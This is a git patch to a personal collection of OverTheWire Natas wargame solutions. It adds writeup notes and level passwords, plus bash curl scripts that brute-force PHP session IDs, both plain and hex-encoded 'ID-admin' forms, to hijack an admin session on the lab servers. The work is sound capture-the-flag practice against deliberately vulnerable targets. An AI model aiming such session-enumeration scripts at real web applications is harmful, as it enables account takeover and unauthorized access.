From 503a8a0c5c103f8e6484eca902e6d72c7c2f4672 Mon Sep 17 00:00:00 2001
From: Emile Clark-Boman <eclarkboman@gmail.com>
Date: Wed, 16 Jul 2025 00:53:52 +1000
Subject: [PATCH] <Natas> natas19.sh + writeup

---
 overthewire/natas/passwords.md       | 94 +++++++++++++++++++++++++++-
 overthewire/natas/scripts/natas18.sh |  4 +-
 overthewire/natas/scripts/natas19.sh | 32 ++++++++++
 3 files changed, 125 insertions(+), 5 deletions(-)
 create mode 100755 overthewire/natas/scripts/natas19.sh

diff --git a/overthewire/natas/passwords.md b/overthewire/natas/passwords.md
index b958a6e..d779fa8 100644
--- a/overthewire/natas/passwords.md
+++ b/overthewire/natas/passwords.md
@@ -72,8 +72,29 @@ natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
 	Another oracle attack using an SQL injection AND this time
 	using a timing based attack.
 	NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]]
-natas19:
-natas20:
+natas19: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr
+  PHP attempts to source `$_SESSION["PHPSESSID"]` from `$_GET`, `$_REQUEST`, and `$_COOKIE`
+  (maybe other's I don't remember exactly). Our session is based solely on
+  `$_COOKIE["PHPSESSID"]` and we know the program specifically uses 0-640 inclusive
+  session ID range. So we can bruteforce this and eventually we'll find
+  a session that is logged in as admin!
+	NOTE: see [[#Natas18 Solution Script|Appendix/"Natas18 Solution Script"]]
+natas20: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw
+  Same exploit as for natas19 except now the session id isn't monotonic
+  restricted to inclusive range 0-640. Instead its hex encoded UTF-8.
+  Decode it to notice its in the format "<ID>-<USERNAME>" where `<ID>` is
+  the same as for natas19. So we slightly modify our program and done!
+  Also remember from natas19 that the admin user has username `admin`
+  (which narrows down the brute force A LOT). You'll find success for `281-admin`.
+	NOTE: see [[#Natas19 Solution Script|Appendix/"Natas19 Solution Script"]]
+natas21:
+natas22:
+natas23:
+natas24:
+natas25:
+natas26:
+natas27:
+  
 
 
 
@@ -390,3 +411,72 @@ get_length
 LENGTH=$?
 exploit_oracle "$LENGTH"
 ```
+
+###### Natas18 Solution Script
+```bash
+#!/usr/bin/env bash
+USERNAME="admin"
+PASSWORD="arbitrary"
+
+req() {
+  SESSION_ID=$1
+  curl http://natas18.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
+       -d "username=$USERNAME" \
+       -d "password=$PASSWORD" \
+       --cookie "PHPSESSID=$SESSION_ID" \
+       -sS \
+    | grep "Password: "
+}
+
+MIN_ID=0
+MAX_ID=640
+for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
+  printf "Attempt: %2d" $i
+  OUT=$(req "$i")
+  if [ $? -ne 0 ]; then
+    echo -en '\r'
+  else
+    echo " [admin]"
+    echo $OUT | awk '{print substr($2,1,32)}'
+    break
+  fi
+done
+```
+
+###### Natas19 Solution Script
+```bash
+#!/usr/bin/env bash
+
+USERNAME="admin"
+PASSWORD="arbitrary"
+
+req() {
+  local SESSION_ID=$1
+  curl http://natas19.natas.labs.overthewire.org/index.php \
+       -X POST                                             \
+       -u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr         \
+       -d "username=$USERNAME"                             \
+       -d "password=$PASSWORD"                             \
+       --cookie "PHPSESSID=$SESSION_ID"                    \
+       -sS                                                 \
+    | grep "Password: "
+}
+
+MIN_ID=0
+MAX_ID=640
+for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
+  # encode integer id as hex `$_COOKIE["PHPSESSID"]` format
+  SESSION_ID=$(echo -n "$i-$USERNAME" | od -A n -t x1 | sed 's/ *//g')
+  printf "Attempt: %2d" $i
+  OUT=$(req "$SESSION_ID")
+  if [ $? -ne 0 ]; then
+    echo -en '\r'
+  else
+    echo " [admin]"
+    echo $OUT | awk '{print substr($2,1,32)}'
+    break
+  fi
+done
+```
diff --git a/overthewire/natas/scripts/natas18.sh b/overthewire/natas/scripts/natas18.sh
index 7b9c2d6..9525cf3 100755
--- a/overthewire/natas/scripts/natas18.sh
+++ b/overthewire/natas/scripts/natas18.sh
@@ -1,12 +1,10 @@
 #!/usr/bin/env bash
 
-#curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/
-
 USERNAME="admin"
 PASSWORD="arbitrary"
 
 req() {
-  SESSION_ID=$1
+  local SESSION_ID=$1
   curl http://natas18.natas.labs.overthewire.org/index.php \
        -X POST \
        -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
diff --git a/overthewire/natas/scripts/natas19.sh b/overthewire/natas/scripts/natas19.sh
new file mode 100755
index 0000000..536beee
--- /dev/null
+++ b/overthewire/natas/scripts/natas19.sh
@@ -0,0 +1,32 @@
+#!/usr/bin/env bash
+
+USERNAME="admin"
+PASSWORD="arbitrary"
+
+req() {
+  local SESSION_ID=$1
+  curl http://natas19.natas.labs.overthewire.org/index.php \
+       -X POST                                             \
+       -u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr         \
+       -d "username=$USERNAME"                             \
+       -d "password=$PASSWORD"                             \
+       --cookie "PHPSESSID=$SESSION_ID"                    \
+       -sS                                                 \
+    | grep "Password: "
+}
+
+MIN_ID=0
+MAX_ID=640
+for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
+  # encode integer id as hex `$_COOKIE["PHPSESSID"]` format
+  SESSION_ID=$(echo -n "$i-$USERNAME" | od -A n -t x1 | sed 's/ *//g')
+  printf "Attempt: %2d" $i
+  OUT=$(req "$SESSION_ID")
+  if [ $? -ne 0 ]; then
+    echo -en '\r'
+  else
+    echo " [admin]"
+    echo $OUT | awk '{print substr($2,1,32)}'
+    break
+  fi
+done